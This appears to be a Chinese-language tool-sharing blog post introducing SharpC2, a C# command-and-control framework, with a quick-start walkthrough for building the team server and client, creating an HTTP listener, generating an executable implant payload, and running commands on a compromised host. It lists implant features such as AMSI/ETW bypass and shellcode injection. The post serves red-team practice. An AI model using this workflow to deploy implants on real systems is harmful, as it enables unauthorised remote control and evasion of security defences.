用C#编写的C2框架
作者:Sec-Labs | 发布时间:
SharpC2
SharpC2是一个用C#编写的C2(命令和控制)框架。
该解决方案由一个ASP.NET核心团队服务器、一个.NET框架植入物和一个.NET客户端组成。
项目地址
https://github.com/SharpC2/SharpC2
快速入门
最快的方法是从github上clone该框架,然后构建并运行调试版本。
PS C:\Tools\SharpC2> dotnet build
Client -> C:\Tools\SharpC2\Client\bin\Debug\net6.0\SharpC2.dll
TeamServer -> C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0\TeamServer.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.98启动团队服务器
PS C:\Tools\SharpC2> cd .\TeamServer\bin\Debug\net6.0\
PS C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0> dotnet TeamServer.dll -p Passw0rd!
info: Microsoft.Hosting.Lifetime[14]
Now listening on: https://0.0.0.0:8443
info: Microsoft.Hosting.Lifetime[0]
Application started. Press Ctrl+C to shut down.
info: Microsoft.Hosting.Lifetime[0]
Hosting environment: Production
info: Microsoft.Hosting.Lifetime[0]
Content root path: C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0注意 :如果服务器在 Development模式下,它只会监听 localhost. 以确保它在 Production模式(因此侦听所有接口上的连接)设置 ASPNETCORE_ENVIRONMENT可变为 Production.
启动客户端
PS C:\Tools\SharpC2\Client\bin\Debug\net6.0> dotnet SharpC2.dll -s localhost -p 8443 -n rasta -P Passw0rd!
___ _ ___ ___
/ __| |_ __ _ _ _ _ __ / __|_ )
\__ \ ' \/ _` | '_| '_ \ (__ / /
|___/_||_\__,_|_| | .__/\___/___|
|_|
@_RastaMouse
@_xpn_
Server Certificate
------------------
[Subject]
CN=localhost
[Issuer]
CN=localhost
[Serial Number]
67B4A5487F67745B
[Not Before]
25/02/2021 21:01:43
[Not After]
25/02/2022 21:01:43
[Thumbprint]
B968C8D9C2B40F4AD7A46C92B0B700DEE46492FE
accept? [y/N] >创建并启动 HTTP 处理程序
使用 create命令来创建一个新的处理程序。 用法是: create <name> <type>. 有效类型是 HTTP, TCP和 SMB.
[drones] > handlers
[handlers] > list
No Handlers
[handlers] > create demo-http HTTP
[+] Handler "demo-http" created.创建处理程序后,您可以使用 set命令。 用法是: set <handler> <parameter> <value>.
[handlers] > set demo-http BindPort 8080
[+] BindPort set to 8080
[handlers] > set demo-http ConnectPort 8080
[+] ConnectPort set to 8080最后,使用 start命令。 用法是: start <handler>.
[handlers] > start demo-http
[+] Handler "demo-http" started.
[handlers] > list
Name Running
---- -------
demo-http True为处理程序生成有效负载
使用 payload命令为处理程序生成有效负载。 用法是: payload <handler> <format> <path>. 有效格式为: Exe, Dll, Raw& Svc.
[drones] > payload demo-http Exe c:\payloads\http-drone.exe
[+] 164352 bytes saved.执行有效载荷,Drone应该签入。
[+] Drone fea75efa53 checked in from Daniel@Ghost-Canyon.
[drones] > list
Guid Parent Address Hostname Username Process Pid Integrity Arch LastSeen
---- ------ ------- -------- -------- ------- --- --------- ---- --------
fea75efa53 - 192.168.1.229 Ghost-Canyon Daniel http-drone 17300 Medium x64 18/12/2021 16:11:20与Drone互动
通过 interact命令。 用法是: interact <guid>.
[drones] > interact fea75efa53
[fea75efa53] > help
Name Description
---- -----------
abort Abort a running task
back Go back to the previous screen
bypass Set a directive to bypass AMSI/ETW on tasks
cat Read a file as text
cd Change working directory
execute-assembly Execute a .NET assembly
exit Exit this Drone
getuid Get current identity
help Print a list of commands and their description
link Link to an SMB Drone
load-module Load an external Drone module
ls List filesystem
mkdir Create a directory
overload Map and execute a native DLL
ps List running processes
pwd Print working directory
rm Delete a file
rmdir Delete a directory
run Run a command
services List services on the current or target machine
shell Run a command via cmd.exe
shinject Inject arbitrary shellcode into a process
sleep Set sleep interval and jitter
upload Upload a file to the current working directory of the Drone
[fea75efa53] > getuid
[+] Tasked Drone to run getuid: 3989657f56.
[+] Drone checked in. Sent 176 bytes.
[+] Drone task 3989657f56 is running.
GHOST-CANYON\Daniel
[+] Drone task 3989657f56 has completed.
标签:工具分享, C2框架